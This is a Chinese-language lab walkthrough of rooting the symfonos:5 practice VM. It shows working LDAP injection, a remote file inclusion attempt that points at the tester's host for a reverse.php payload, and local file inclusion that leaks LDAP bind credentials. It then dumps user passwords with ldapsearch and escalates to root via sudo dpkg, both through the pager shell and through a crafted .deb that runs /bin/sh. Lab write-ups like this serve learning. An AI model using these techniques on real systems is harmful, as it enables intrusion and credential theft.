本文内容纯属虚构，攻略鸭求b站关注点赞支持！

靶机IP地址：192.168.31.197

测试机IP地址：192.168.31.38

外部信息收集

访问http://192.168.31.197/只有一个图片。

端口扫描

PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open  ldap     syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl? syn-ack ttl 63
LDAP Results
|   <ROOT>
|       namingContexts: dc=symfonos,dc=local
|       supportedControl: 2.16.840.1.113730.3.4.18
...
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: OTP
|       supportedSASLMechanisms: NTLM
|       supportedSASLMechanisms: CRAM-MD5
|_      subschemaSubentry: cn=Subschema

LDAP匿名登录

$ ldapdomaindump 192.168.31.197

失败

网站目录枚举

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.197/FUZZ -e .php,.txt -c
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
home.php                [Status: 302, Size: 979, Words: 117, Lines: 29, Duration: 2ms]
admin.php               [Status: 200, Size: 1650, Words: 707, Lines: 40, Duration: 1ms]
static                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 0ms]
portraits.php           [Status: 200, Size: 165, Words: 10, Lines: 4, Duration: 13ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]

访问http://192.168.31.197/admin.php为登录界面

尝试SQLi

GET /admin.php?username=admin%27or%271&password=asfd

未成功

发现漏洞测试点

(1)敏感信息发现

GET /home.php

返回包：

HTTP/1.1 302 Found

data中看到http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php

(2)LDAP注入

想到存在LDAP服务，尝试LDAP注入。

GET /admin.php?username=*&password=*
登录成功
发现存在页面http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php
修改URL为http://192.168.31.197/home.php?url=http://127.0.0.1/portraits.php

测试文件包含漏洞

尝试RFI

http://192.168.31.197/home.php?url=http://192.168.31.38:8088/reverse.php

发现PHP文件未解析

GET /home.php?url=http://127.0.0.1/admin.php

显示了页面内容，但无PHP

尝试LFI

GET /home.php?url=admin.php

返回包中：

$ldap_ch = ldap_connect("ldap://172.18.0.22");
$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);

访问LDAP

通过jxplorer

DN：cn=admin,dc=symfonos,dc=local

密码：qMDdyZh3cT6eeAWD

通过ldapsearch

$ ldapsearch -x -H ldap://192.168.31.197 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'
# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User

登录后得到：

cn admin
userPassword:
{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm

cn:zeus
gecos:Zeus User
gidNumber:14564100
homeDirectory:/home/zeus
loginShell:/bin/bash
mail:zeus@symfonos.local
objectClass:
top
posixAccount
inetOrgPerson
sn:3
uid:zeus
uidNumber:14583102
userPassword:cetkKf4wCuHC9FET

通过用户名口令尝试连接SSH

ssh zeus@192.168.31.197
zeus@symfonos5:~$ id
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

sudo提权

$ sudo -l
Matching Defaults entries for zeus on symfonos5:
  env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
  (root) NOPASSWD: /usr/bin/dpkg

方法1

$ sudo dpkg -l
!/bin/sh
ii  cpio              2.12+dfsg-9         amd64     GNU cpio -- a program to manage archives of files
ii  cpp              4:8.3.0-1          amd64     GNU C preprocessor (cpp)
ii  cpp-8             8.3.0-6           amd64     GNU C preprocessor
ii  cron              3.0pl1-134+deb10u1      amd64     process scheduling daemon
罗列时在底部输入：
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

方法2

fpm需要rubygems等，Debian类系统安装:
sudo apt-get install ruby ruby-dev rubygems build-essential
sudo gem install --no-document fpm
fpm --version

touch exp.sh
echo 'exec /bin/sh' > exp.sh
fpm -n x -s dir -t deb -a all --before-install exp.sh .
ls -al
-rw-r--r--  1 kali kali 8341274 Feb 21 04:38 x_1.0_all.deb
传到靶机
$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# id
uid=0(root) gid=0(root) groups=0(root)

其他

flag

# cat /root/proof.txt
Congrats on rooting symfonos:5!

靶机问题

fuzz LDAP和LFI时未成功，错误返回Wrong scheme! You can only use http or https!还十分逼真，以为是过滤了。重新导入虚拟机才可能好。